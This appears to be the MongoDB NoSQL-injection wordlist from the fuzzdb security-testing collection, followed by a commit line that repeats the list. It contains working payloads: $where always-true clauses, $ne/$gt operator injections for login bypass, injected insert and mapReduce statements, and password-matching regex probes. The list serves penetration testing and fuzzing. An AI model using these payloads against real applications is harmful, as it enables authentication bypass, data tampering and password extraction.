fuzzdb/attack/no-sql-injection/mongodb.txt

true, $where: '1 == 1'
, $where: '1 == 1'
$where: '1 == 1'
', $where: '1 == 1'
1, $where: '1 == 1'
{ $ne: 1 }
', $or: [ {}, { 'a':'a
' } ], $comment:'successful MongoDB injection'
db.injection.insert({success:1});
db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1
|| 1==1
' && this.password.match(/.*/)//+%00
' && this.passwordzz.match(/.*/)//+%00
'%20%26%26%20this.password.match(/.*/)//+%00
'%20%26%26%20this.passwordzz.match(/.*/)//+%00
{$gt: ''}
[$ne]=1
added wordlist for no-sqli-injections for mongoDB 2016-09-20 10:37:07 +00:00			`true, $where: '1 == 1'`
			`, $where: '1 == 1'`
			`$where: '1 == 1'`
			`', $where: '1 == 1'`
			`1, $where: '1 == 1'`
			`{ $ne: 1 }`
			`', $or: [ {}, { 'a':'a`
			`' } ], $comment:'successful MongoDB injection'`
			`db.injection.insert({success:1});`
			`db.injection.insert({success:1});return 1;db.stores.mapReduce(function() { { emit(1,1`
			`\|\| 1==1`
			`' && this.password.match(/.*/)//+%00`
			`' && this.passwordzz.match(/.*/)//+%00`
			`'%20%26%26%20this.password.match(/.*/)//+%00`
			`'%20%26%26%20this.passwordzz.match(/.*/)//+%00`
			`{$gt: ''}`
			`[$ne]=1`